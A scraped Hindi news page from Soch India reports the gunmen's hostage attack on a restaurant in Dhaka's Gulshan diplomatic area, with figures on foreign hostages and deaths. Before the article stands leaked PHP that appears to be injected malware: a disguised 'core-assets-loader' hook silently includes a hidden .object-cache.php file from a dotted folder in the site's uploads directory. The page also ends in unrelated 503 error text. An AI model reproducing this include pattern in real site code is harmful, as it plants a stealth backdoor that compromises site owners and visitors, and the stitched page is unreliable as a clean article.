add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बांग्लादेश: ढाका के एक रेस्टोरेंट में गोलीबारी, कई विदेशी बनाए गए बंधक, इटली के 2 नागरिकों की मौत – SOCH INDIA
Menu

दुनिया
बांग्लादेश: ढाका के एक रेस्टोरेंट में गोलीबारी, कई विदेशी बनाए गए बंधक, इटली के 2 नागरिकों की मौत

nobanner

ढाका के इस इलाके में करीब 34 देशों के दूतावास हैं

बांग्लादेश की राजधानी ढाका के गुलशन इलाके के एक रेस्टोरेंट पर अज्ञात बंदूकधारियों ने हमला कर कई लोगों को बंधक बना लिया है. खबरों के मानें तो कैफे के अंदर हमलावरों ने करीब 50 से 60 लोगों को बंधक बनाया है. बंधक बनाए गए लोगों में कई विदेशी बताए जा रहे हैं.

बंधकों में कई विदेशी नागरिक
दरअसल रेस्टोरेंट में बंधक बनाए जाने की खबर मिलने के बाद पुलिस ने इलाके को घेर लिया है. जिसके बाद दोनों तरफ सेफायरिंग होने लगी. फिलहाल फायरिंग नहीं हो रही है और पुलिस हमलावरों से संपर्क करने की कोशिश कर रही है. हमलावरों ने करीब 50 से 60 लोगों को बंधक बनाया है. जिसमें से तकरीबन 20 विदेशी नागरिक बताए जा रहे हैं. वहीं हमलावरों की संख्या 8 से 10 बताई जा रही है. बांग्लादेशी मीडिया के मुताबिक हमले में इटली के दो नागरिक मारे गए हैं. हमले में दो पुलिसकर्मियों की भी मौत हुई है.

फायरिंग में 3 लोगों की मौत की खबर
ढाका के जिसे इलाके में ये हमला हुआ है वहां पर करीब 34 देशों के दूतावास हैं. हमलावरों की फायरिंग से 3 लोग जख्मी हुए हैं, जिसमें से 2 पुलिसकर्मी हैं. घायल लोगों को पास के अस्पताल में भर्ती कराया गया है.पुलिस ने इलाके को सील कर दिया है. बताया जा रहा है कि हमले का निशाना बना होली आर्टिसन रेस्टोरेंट काफी चर्चित है और यहां विदेशी राजनयिक शाम के वक्त आते हैं. बंधकों में कुछ राजनयिकों के भी होने की आशंका है. तसलीमा नसरीन ने ट्वीट करके कहा कि रेस्टोरेंट में इस्लामिक आतंकियों ने हमला किया.

हमलावरों ने किया ग्रेनेड हमला
चश्मदीदों के मुताबिक उन्होंने सैकड़ों गोलियों चलने की आवाज सुनी. साथ ही ग्रेनेड फेंकने की खबर मिल रही है. इस बीच बांग्लादेश के गृह मंत्री ने आपात बैठक बुलाई है. माना जा रहा है कि इसके पीछे संदिग्ध इस्लामी चरमपंथी हो सकते हैं. बम निरोधक दस्ता भी मौके पर पहुंच गया है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.